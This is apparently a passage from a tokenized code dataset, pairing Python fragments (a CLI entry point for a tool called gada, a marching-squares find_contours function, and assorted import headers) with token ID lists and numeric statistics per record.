... 'bin': 'echo'
... }
... }
... })
>>>
>>> # Need to create fake stdin and stdout for unittests
>>> with gada.test_utils.PipeStream() as stdin:
... with gada.test_utils.PipeStream() as stdout:
... # Run node with CLI arguments
... gada.main(
... ['gada', 'testnodes.echo', 'hello'],
... stdin=stdin.reader,
... stdout=stdout.writer,
... stderr=stdout.writer
... )
...
... # Close writer end so we can read form it
... stdout.writer.close()
...
... # Read node output
... stdout.reader.read().decode().strip()
'hello'
>>>
The three parameters ``stdin``, ``stdout`` or ``stderr`` are provided as a convenience
for writing unit tests when you can't use ``sys.stdin`` or ``sys.stdout``, or simply
when you want to be able to read from the output.
:param argv: command line arguments
:param stdin: input stream
:param stdout: output stream
:param stderr: error stream
"""
argv = sys.argv if argv is None else argv
parser = argparse.ArgumentParser(prog="Service", description="Help")
parser.add_argument("node", type=str, help="command name")
parser.add_argument(
"argv", type=str, nargs=argparse.REMAINDER, help="additional CLI arguments"
)
parser.add_argument("-v", "--verbose", action="store_true", help="Verbosity level")
args = parser.parse_args(args=argv[1:])
node_argv, gada_argv = split_unknown_args(args.argv)
run(node=args.node, argv=node_argv, stdin=stdin, stdout=stdout, stderr=stderr)
if __name__ == "__main__":
main(sys.argv)
| [
6738,
11593,
37443,
834,
1330,
37647,
198,
198,
834,
439,
834,
796,
14631,
5143,
1600,
366,
12417,
8973,
198,
11748,
28686,
198,
11748,
25064,
198,
11748,
33245,
198,
11748,
1822,
29572,
198,
6738,
19720,
1330,
32233,
198,
6738,
308,
4763... | 2.159314 | 2,448 |
import numpy as np
from . import _find_contours
from collections import deque
_param_options = ('high', 'low')
def find_contours(array, level,
fully_connected='low', positive_orientation='low'):
"""Find iso-valued contours in a 2D array for a given level value.
Uses the "marching squares" method to compute a the iso-valued contours of
the input 2D array for a particular level value. Array values are linearly
interpolated to provide better precision for the output contours.
Parameters
----------
array : 2D ndarray of double
Input data in which to find contours.
level : float
Value along which to find contours in the array.
fully_connected : str, {'low', 'high'}
Indicates whether array elements below the given level value are to be
considered fully-connected (and hence elements above the value will
only be face connected), or vice-versa. (See notes below for details.)
positive_orientation : either 'low' or 'high'
Indicates whether the output contours will produce positively-oriented
polygons around islands of low- or high-valued elements. If 'low' then
contours will wind counter- clockwise around elements below the
iso-value. Alternately, this means that low-valued elements are always
on the left of the contour. (See below for details.)
Returns
-------
contours : list of (n,2)-ndarrays
Each contour is an ndarray of shape ``(n, 2)``,
consisting of n ``(x, y)`` coordinates along the contour.
Notes
-----
The marching squares algorithm is a special case of the marching cubes
algorithm [1]_. A simple explanation is available here::
http://www.essi.fr/~lingrand/MarchingCubes/algo.html
There is a single ambiguous case in the marching squares algorithm: when
a given ``2 x 2``-element square has two high-valued and two low-valued
elements, each pair diagonally adjacent. (Where high- and low-valued is
with respect to the contour value sought.) In this case, either the
high-valued elements can be 'connected together' via a thin isthmus that
separates the low-valued elements, or vice-versa. When elements are
connected together across a diagonal, they are considered 'fully
connected' (also known as 'face+vertex-connected' or '8-connected'). Only
high-valued or low-valued elements can be fully-connected, the other set
will be considered as 'face-connected' or '4-connected'. By default,
low-valued elements are considered fully-connected; this can be altered
with the 'fully_connected' parameter.
Output contours are not guaranteed to be closed: contours which intersect
the array edge will be left open. All other contours will be closed. (The
closed-ness of a contours can be tested by checking whether the beginning
point is the same as the end point.)
Contours are oriented. By default, array values lower than the contour
value are to the left of the contour and values greater than the contour
value are to the right. This means that contours will wind
counter-clockwise (i.e. in 'positive orientation') around islands of
low-valued pixels. This behavior can be altered with the
'positive_orientation' parameter.
The order of the contours in the output list is determined by the position
of the smallest ``x,y`` (in lexicographical order) coordinate in the
contour. This is a side-effect of how the input array is traversed, but
can be relied upon.
.. warning::
Array coordinates/values are assumed to refer to the *center* of the
array element. Take a simple example input: ``[0, 1]``. The interpolated
position of 0.5 in this array is midway between the 0-element (at
``x=0``) and the 1-element (at ``x=1``), and thus would fall at
``x=0.5``.
This means that to find reasonable contours, it is best to find contours
midway between the expected "light" and "dark" values. In particular,
given a binarized array, *do not* choose to find contours at the low or high
value of the array. This will often yield degenerate contours, especially
around structures that are a single array element wide. Instead choose
a middle value, as above.
References
----------
.. [1] Lorensen, William and Harvey E. Cline. Marching Cubes: A High
Resolution 3D Surface Construction Algorithm. Computer Graphics
(SIGGRAPH 87 Proceedings) 21(4) July 1987, p. 163-170).
"""
array = np.asarray(array, dtype=np.double)
if array.ndim != 2:
raise RuntimeError('Only 2D arrays are supported.')
level = float(level)
if (fully_connected not in _param_options or
positive_orientation not in _param_options):
raise ValueError('Parameters "fully_connected" and'
' "positive_orientation" must be either "high" or "low".')
point_list = _find_contours.iterate_and_store(array, level,
fully_connected == 'high')
contours = _assemble_contours(_take_2(point_list))
if positive_orientation == 'high':
contours = [c[::-1] for c in contours]
return contours
| [
11748,
299,
32152,
355,
45941,
198,
6738,
764,
1330,
4808,
19796,
62,
3642,
4662,
198,
198,
6738,
17268,
1330,
390,
4188,
198,
198,
62,
17143,
62,
25811,
796,
19203,
8929,
3256,
705,
9319,
11537,
198,
198,
4299,
1064,
62,
3642,
4662,
... | 3.156532 | 1,661 |
import logging
from zygoat.utils.files import repository_root
from zygoat.config import Config
log = logging.getLogger()
| [
11748,
18931,
198,
198,
6738,
1976,
88,
2188,
265,
13,
26791,
13,
16624,
1330,
16099,
62,
15763,
198,
6738,
1976,
88,
2188,
265,
13,
11250,
1330,
17056,
198,
198,
6404,
796,
18931,
13,
1136,
11187,
1362,
3419,
628
] | 3.263158 | 38 |
from typing import Generic
from typing import Iterable
from typing import Iterator
from typing import TypeVar
import dataclasses
from .page_position import PagePosition
T = TypeVar('T')
@dataclasses.dataclass(frozen=True)
| [
6738,
19720,
1330,
42044,
198,
6738,
19720,
1330,
40806,
540,
198,
6738,
19720,
1330,
40806,
1352,
198,
6738,
19720,
1330,
5994,
19852,
198,
198,
11748,
4818,
330,
28958,
198,
198,
6738,
764,
7700,
62,
9150,
1330,
7873,
26545,
198,
198,
... | 3.546875 | 64 |